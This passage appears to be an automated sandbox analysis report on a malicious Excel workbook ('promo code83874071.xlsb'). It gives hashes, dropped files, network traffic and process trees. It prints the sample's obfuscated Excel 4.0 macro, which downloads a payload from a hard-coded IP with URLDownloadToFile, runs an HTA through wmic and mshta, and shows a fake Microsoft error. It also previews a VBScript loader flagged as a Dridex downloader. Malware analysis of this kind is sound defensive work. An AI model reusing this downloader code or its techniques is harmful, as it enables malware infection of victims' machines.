                                                                                                                                                                    8993268.xlsbGet hashmaliciousBrowse
                                                                                                                                                                      promo 2352017.xlsbGet hashmaliciousBrowse
                                                                                                                                                                        8993268.xlsbGet hashmaliciousBrowse
                                                                                                                                                                          promo 2352017.xlsbGet hashmaliciousBrowse
                                                                                                                                                                            Offer 373466695.xlsbGet hashmaliciousBrowse
                                                                                                                                                                              Offer 373466695.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                9049521.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                  9049521.xlsbGet hashmaliciousBrowse

                                                                                                                                                                                    Domains

                                                                                                                                                                                    No context

                                                                                                                                                                                    ASN

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    TRANSIP-ASAmsterdamtheNetherlandsNLpromo code83874071.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    vote number3210109.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    tax77567960.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    hunting license-25331.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    vote number3210109.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    tax77567960.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    subscription-84799.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    hunting license-25331.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    subscription-84799.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    8993268.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    promo 2352017.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    8993268.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    promo 2352017.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    Offer 373466695.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    Offer 373466695.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    9049521.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    9049521.xlsbGet hashmaliciousBrowse
                                                                                                                                                                                    • 136.144.181.174
                                                                                                                                                                                    arm6-20211124-0649Get hashmaliciousBrowse
                                                                                                                                                                                    • 37.97.150.92
                                                                                                                                                                                    4VsoRulf3zGet hashmaliciousBrowse
                                                                                                                                                                                    • 95.170.75.156
                                                                                                                                                                                    3XVTeL2yOEGet hashmaliciousBrowse
                                                                                                                                                                                    • 95.170.75.177

                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                    No context

                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                    No context

                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                    C:\ProgramData\MqscKrfE.rtf
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4837
                                                                                                                                                                                    Entropy (8bit):5.069907978358339
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:EBFenMtYKBMmqwrSxxx+kBoZGogeR2WeJVpz2CHBk+FX/B:EBFeMtRBMmqw+xxgkBoZ2Cyp6CHBk+lp
                                                                                                                                                                                    MD5:1CFF01224E36F917085D258D50118A8E
                                                                                                                                                                                    SHA1:9F4DB0467D5733FBF5554D257804175587D4C9F5
                                                                                                                                                                                    SHA-256:08C6AEE2C0D5C42B3E8E2DA43DB9F3775FE2DA95D8BCA17A42BC1F218E2C8A6F
                                                                                                                                                                                    SHA-512:6349CBF791C0B60F1D60E75E7037F8A9E09FF17B3241A159753248E0E4D30D6830ABC0763F70AEF14A01433DF59812D41D6CA1F6B8ECB58DFF61B2B2AB97DC79
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\MqscKrfE.rtf, Author: Joe Security
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..l_h_V_f_v_n_A_p_a_o = Chr(114+1-1) & "und" & Chr(108+1-1) & "l32" & ".ex" & "e " & Chr(67+1-1) & Chr(58+1-1) & "\\" & "Pro" & "" & "gr" & Chr(97+1-1) & "" & Chr(109+1-1) & "Da" & "ta" & "\ux" & "nig" & "ge" & "r.b" & "in" & " Dl" & Chr(108+1-1) & "Re" & "gis" & Chr(116+1-1) & "" & "erS" & "" & "" & "er" & Chr(118+1-1) & Chr(101+1-1) & Chr(114+1-1)..Set H_y_H_u_M_Z_N_q_s_B_t_f = CreateObject(Chr(77+1-1) & "SX" & "" & "ML2" & "" & ".Se" & "" & "rve" & "rXM" & "" & "" & "LH" & "TTP" & "" & ".6." & Chr(48+1-1))....F_c_M_I_P_M_P = Chr(87+1-1) & Chr(115+1-1) & "" & "" & "cr" & "" & "" & Chr(105+1-1) & "pt" & ".Sh" & Chr(101+1-1) & "ll"..Set x_V_R_c_H_E_A_D = CreateObject(F_c_M_I_P_M_P)..c_B_R_p_U_s_M_Z_S_H_U_o_f_i = LCase(x_V_R_c_H_E_A_D.expanden
                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\83AB67A7-816A-439D-B972-9539D466DB6C
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):140183
                                                                                                                                                                                    Entropy (8bit):5.357952643181742
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:xcQIfgxrBdA3gBwtnQ9DQW+zCA4Ff7nXbovidXiE6LWmE9:DuQ9DQW+zcXfH
                                                                                                                                                                                    MD5:11C8242FFBB9A3D0262A4CB3A59FF6EB
                                                                                                                                                                                    SHA1:D17BF9A620459817840F37A19D824F680B85372D
                                                                                                                                                                                    SHA-256:D64A1108D31B3E45472C5F362C1786651C0CE93D939A1DB7E47C9778F7E844BC
                                                                                                                                                                                    SHA-512:4B73010945825C114B2678D55E6C15C112903D9A262233FE6FFACDBA17FB9FA0E146F4FBBAE413379364D8B05E82E1C4FF6FA0811179E316E47F5BC72B5C3672
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-11-24T16:58:09">.. Build: 16.0.14715.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\C1975964.png
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:PNG image data, 253 x 56, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2132
                                                                                                                                                                                    Entropy (8bit):7.843504298247007
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:sWXNC7ZlORZ6PY8PUWQSfh7qwP3vCO4aKskuWZnHW5PG:7X07KKPNPzflWRE9G
                                                                                                                                                                                    MD5:EE8845A94C57D17AD60274843D6352B4
                                                                                                                                                                                    SHA1:16BF71D674CE3AD0BABBC373784F1551CFF290C0
                                                                                                                                                                                    SHA-256:87030B4555CA7382C936656D1E9777EEC4A99DE34096CDF4B0CBF71D4B7C0327
                                                                                                                                                                                    SHA-512:26B1B09A77666292F427D4AFD150C8490C05201E59B2E11002B25897E3D04099206477A3212FFBE7A6278517DA08D7BB83DB5CF24E35754B00E7925A803E1D20
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview: .PNG........IHDR.......8......ri.....IDATx..mP.......,....;((.J,bA.Q*..Z.tZg.Z'mRm....5...m....M2.m.j....M.%(JYQ^.0Z.%B@.a...ey....lV\W.k......=.>w..r....r.A..!..'@....{.GH.......!..<B.'x.tO......=.#.{.GH.......!..<B.'x.tO......=.#.{.GH........pc..#...I.....k..9.n..L.fk=.IX.*...i.w.t.0.~.R..m......zIO.u._p,O.....M-'?b..O+|...7...Y.tV...ik~.,S..{...n}x...9.....}9.Q.....n6.._M.. ......`........GF............go....1.w.8.....Q...N...l..9m"\... ..AiK....30%.@.....x....xfx.NR..lw..)T>a..t...Q..:....Oz.....2...e.o..y..........9.v.:.g[.=QA..O^.....+..O..?\.v5.5.V...6+.....R...-.9W.....1.&+.f..?..J*L.e.....*K._1+.....D:.3qH....T.a...._.`l..x~u....W..i...vs.w.0.yMVR..k{_b?N....W..t......~T....\.. ...sP....@U[.c+sm...S..E.c..I.Nq..M...U....R..>....h.j..}.6.i.a}.}}.]..N......5f}7.....E...7..F.e*....f6w~6. ..C]..+7..(/.h.v.._..e/..G._.5pO..........w.5.{.`......H...u.....h.......~..@.......w..kd.Ko..I.Nq..t....+`^...}'......s.Q.P.~2...B.@..tU..&..
                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\DD116215.png
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:PNG image data, 263 x 339, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):44006
                                                                                                                                                                                    Entropy (8bit):7.976979311921259
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:HPirG+t6Agvu1hp+S+bGDkP7wozsIukTKu/lvL7AbvWFp1m+MNd:HP2CET+S+agP7nA9u9DE2w
                                                                                                                                                                                    MD5:DA7AC5F9F71DEA76034FD690CFEBFE71
                                                                                                                                                                                    SHA1:F01154ACFD3B8792E5DB230C7205A4B618D45235
                                                                                                                                                                                    SHA-256:31B35E7A9BD151A7B1D88CAF5476D761F51030E61E0BC4DCD41684F52385A4ED
                                                                                                                                                                                    SHA-512:FA86DF5B9A482537FC9E9392F1C65237630B3CDAB2C6E58C160CD0C2C1644720C7B8211EB46FB405D9D9359C960E747A53088F9DE74B4AB4431DE62FA3FD98BA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                                                                    Preview: .PNG........IHDR.......S.....4..F...JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                                                                                                                                                                                    C:\Users\user\Desktop\~$promo code83874071.xlsb
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):165
                                                                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                    \Device\ConDrv
                                                                                                                                                                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):160
                                                                                                                                                                                    Entropy (8bit):5.083203110114614
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgnWXeyswFJQAive2:Yw7gJGWMXJXKSOdYiygKkXe/egW9eAin
                                                                                                                                                                                    MD5:F71A445B2B25B5F344258198713D81FA
                                                                                                                                                                                    SHA1:19CAD13D48B3A610F17F7FD9666428DAC48C7E50
                                                                                                                                                                                    SHA-256:719FBF3A2CA062EE3274A3D3308C6C7FD4364FF1267892CFF21D20D05855811E
                                                                                                                                                                                    SHA-512:3B75DCB4F8969B810C70A06BEEFE56AC75A38107EA291FD2C58AD6576398556DAE1B3C00C644618BAD779EAA7CC08CDC12302607DDBF8A73F235F5B7075D1D38
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 5380;...ReturnValue = 0;..};....

                                                                                                                                                                                    Static File Info

                                                                                                                                                                                    General

                                                                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                                                                    Entropy (8bit):7.8656530304107255
                                                                                                                                                                                    TrID:
                                                                                                                                                                                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                                                                                                                                                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                                                                                                                                                    • ZIP compressed archive (8000/1) 5.73%
                                                                                                                                                                                    File name:promo code83874071.xlsb
                                                                                                                                                                                    File size:84285
                                                                                                                                                                                    MD5:b6c09b88eeb411e648f688e7ca6a1ca9
                                                                                                                                                                                    SHA1:da6a58fbb01118bf77842f75cb217c3cf33ded2f
                                                                                                                                                                                    SHA256:cb53bf4394e7f77534ca8bfa1039fc76c50a54be4dce411926dbb594a1a55c52
                                                                                                                                                                                    SHA512:adb123a059e116faa65717e4c7cd51479750d45457e63642b16dcc82b7b25c18ef5c43e9c54fc35ae5056b243ba1177d01453f0f985f48d6b9a031079a874f00
                                                                                                                                                                                    SSDEEP:1536:UWLP2CET+S+agP7nA9u9DE23j/iuRPk4OJ2QspRxW+gdFx:V0T1k7TA+jiq1i2QspRk+gdFx
                                                                                                                                                                                    File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                                                    File Icon

                                                                                                                                                                                    Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                                                    Static OLE Info

                                                                                                                                                                                    General

                                                                                                                                                                                    Document Type:OpenXML
                                                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                                                    OLE File "promo code83874071.xlsb"

                                                                                                                                                                                    Indicators

                                                                                                                                                                                    Has Summary Info:
                                                                                                                                                                                    Application Name:
                                                                                                                                                                                    Encrypted Document:
                                                                                                                                                                                    Contains Word Document Stream:
                                                                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                                                    Flash Objects Count:
                                                                                                                                                                                    Contains VBA Macros:

                                                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                                                    0,564,=FOPEN("C:\Program" & CHAR(68) & "ata\Mq" & CHAR(115) & "cK" & CHAR(114) & "fE.rt" & CHAR(102), 3)
                                                                                                                                                                                    1,564,=A119+C1986
                                                                                                                                                                                    3,564,=B9697+C9656
                                                                                                                                                                                    4,564,=A1545+A1514
                                                                                                                                                                                    5,564,=A7302+A1627
                                                                                                                                                                                    6,564,=A1643+D2897
                                                                                                                                                                                    8,564,=A6796+C2237
                                                                                                                                                                                    9,564,=C2398+A2055
                                                                                                                                                                                    11,564,=A9056+C3566
                                                                                                                                                                                    13,564,=B4805+D1059
                                                                                                                                                                                    14,564,=C8951+B4440
                                                                                                                                                                                    15,564,=FOR.CELL("lHiAAPCptvMg",Sheet1!CR162:CR4998, TRUE)
                                                                                                                                                                                    16,564,=B8664+D9799
                                                                                                                                                                                    17,564,=D3541+B7263
                                                                                                                                                                                    19,564,=A248+B3581
                                                                                                                                                                                    20,564,=D1725+D9967
                                                                                                                                                                                    22,564,=C8814+A8633
                                                                                                                                                                                    23,564,=B3769+D171
                                                                                                                                                                                    25,564,=FWRITE(0,CHAR(lHiAAPCptvMg))
                                                                                                                                                                                    27,564,=B5470+C2385
                                                                                                                                                                                    28,564,=A3061+A8921
                                                                                                                                                                                    31,564,=A1799+B6964
                                                                                                                                                                                    34,564,=B4651+C1225
                                                                                                                                                                                    35,564,=C997+B3770
                                                                                                                                                                                    36,564,=NEXT()
                                                                                                                                                                                    37,564,=C3329+C561
                                                                                                                                                                                    38,564,=B1583+A5638
                                                                                                                                                                                    40,564,=D3385+B8800
                                                                                                                                                                                    41,564,=A9622+C6392
                                                                                                                                                                                    42,564,=B6167+D2582
                                                                                                                                                                                    43,564,=D8862+D8540
                                                                                                                                                                                    44,564,=D9501+B417
                                                                                                                                                                                    47,564,=D2699+D2334
                                                                                                                                                                                    50,564,=D6016+D6337
                                                                                                                                                                                    51,564,=EXEC("wmi" & CHAR(99) & " process " & CHAR(99) & "all c" & CHAR(114) & CHAR(101) & CHAR(97) & "te" & CHAR(32) & CHAR(34) & CHAR(109) & "shta " & CHAR(67) & CHAR(58) & "\ProgramData\MqscKrfE.r" & CHAR(116) & "" & CHAR(102) & CHAR(34) & "")
                                                                                                                                                                                    54,564,=C7418+C6093
                                                                                                                                                                                    55,564,=B469+C2484
                                                                                                                                                                                    57,564,=B3751+B8243
                                                                                                                                                                                    60,564,=A3749+C8271
                                                                                                                                                                                    62,564,=B5314+B4037
                                                                                                                                                                                    64,564,=CALL("urlmo" & CHAR(110) & "", "URLDownloadToFile" & CHAR(65),CHAR(74) & "" & CHAR(74) & "" & CHAR(67) & "CJJ", 0, "" & CHAR(104) & "" & CHAR(116) & CHAR(116) & CHAR(112) & CHAR(58) & "//" & CHAR(49) & CHAR(51) & "6.144.181.17" & CHAR(52) & CHAR(58) & "8080/Q2" & CHAR(87) & CHAR(53) & "VWUFL" & CHAR(53) & "VCM" & CHAR(81) & "7JQ" & CHAR(80) & "ETG3CCTYX" & CHAR(55) & "2Z4R25P" & CHAR(68) & CHAR(71), CHAR(67) & ":\P" & CHAR(114) & "ogramD" & CHAR(97) & CHAR(116) & "a\ndLVE" & CHAR(72) & CHAR(85) & "kDB" & CHAR(84) & "Bat.txt",0,0)
                                                                                                                                                                                    67,564,=C3088+A2120
                                                                                                                                                                                    68,564,=A7985+A5936
                                                                                                                                                                                    70,564,=C3892+A3029
                                                                                                                                                                                    71,564,=B4635+B8757
                                                                                                                                                                                    72,564,=D2160+B4504
                                                                                                                                                                                    74,564,=D4057+C3593
                                                                                                                                                                                    75,564,=D2836+B2913
                                                                                                                                                                                    76,564,=B6518+A6144
                                                                                                                                                                                    79,564,=ALERT("Error! Sen" & CHAR(100) & "in" & CHAR(103) & " r" & CHAR(101) & CHAR(112) & "ort " & CHAR(116) & "o Micr" & CHAR(111) & "soft...")
                                                                                                                                                                                    80,564,=B4304+B1646
                                                                                                                                                                                    81,564,=C9459+B2452
                                                                                                                                                                                    84,564,=A5157+C9373
                                                                                                                                                                                    85,564,=A2963+D365
                                                                                                                                                                                    86,564,=C6873+A9635
                                                                                                                                                                                    87,564,=B5800+D6250
                                                                                                                                                                                    89,564,=FOPEN("C:\Program" & CHAR(68) & "at" & CHAR(97) & "" & CHAR(92) & "ndLVEHUkDB" & CHAR(84) & "Bat.t" & CHAR(120) & CHAR(116),1)
                                                                                                                                                                                    92,564,=C6541+C9291
                                                                                                                                                                                    93,564,=D6295+A8642
                                                                                                                                                                                    94,564,=A432+D4240
                                                                                                                                                                                    101,564,=D5709+B4754
                                                                                                                                                                                    102,564,=C480+A3565
                                                                                                                                                                                    103,564,=SEND.MAIL(EVALUATE(FREAD(US90,255)))
                                                                                                                                                                                    105,564,=A364+B7903
                                                                                                                                                                                    107,564,=D6868+B9521
                                                                                                                                                                                    111,564,=B6091+A8910
                                                                                                                                                                                    112,564,=A5150+B630
                                                                                                                                                                                    113,564,=B3884+D3160
                                                                                                                                                                                    115,564,=RETURN()
                                                                                                                                                                                    

                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Nov 24, 2021 17:59:03.786461115 CET497778080192.168.2.3136.144.181.174
                                                                                                                                                                                    Nov 24, 2021 17:59:03.814089060 CET808049777136.144.181.174192.168.2.3
                                                                                                                                                                                    Nov 24, 2021 17:59:04.317827940 CET497778080192.168.2.3136.144.181.174
                                                                                                                                                                                    Nov 24, 2021 17:59:04.345633030 CET808049777136.144.181.174192.168.2.3
                                                                                                                                                                                    Nov 24, 2021 17:59:04.849128962 CET497778080192.168.2.3136.144.181.174
                                                                                                                                                                                    Nov 24, 2021 17:59:04.876627922 CET808049777136.144.181.174192.168.2.3

                                                                                                                                                                                    Code Manipulations

                                                                                                                                                                                    Statistics

                                                                                                                                                                                    Behavior

                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                    System Behavior

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:17:58:07
                                                                                                                                                                                    Start date:24/11/2021
                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                    Imagebase:0xbf0000
                                                                                                                                                                                    File size:27110184 bytes
                                                                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:17:59:03
                                                                                                                                                                                    Start date:24/11/2021
                                                                                                                                                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                    Commandline:wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf"
                                                                                                                                                                                    Imagebase:0x9e0000
                                                                                                                                                                                    File size:391680 bytes
                                                                                                                                                                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:17:59:03
                                                                                                                                                                                    Start date:24/11/2021
                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                    Imagebase:0x7ff7f20f0000
                                                                                                                                                                                    File size:625664 bytes
                                                                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:high

                                                                                                                                                                                    General

                                                                                                                                                                                    Start time:17:59:04
                                                                                                                                                                                    Start date:24/11/2021
                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                    Commandline:mshta C:\ProgramData\MqscKrfE.rtf
                                                                                                                                                                                    Imagebase:0x7ff797780000
                                                                                                                                                                                    File size:14848 bytes
                                                                                                                                                                                    MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                    Reputation:moderate

                                                                                                                                                                                    Disassembly

                                                                                                                                                                                    Code Analysis

                                                                                                                                                                                    Reset < >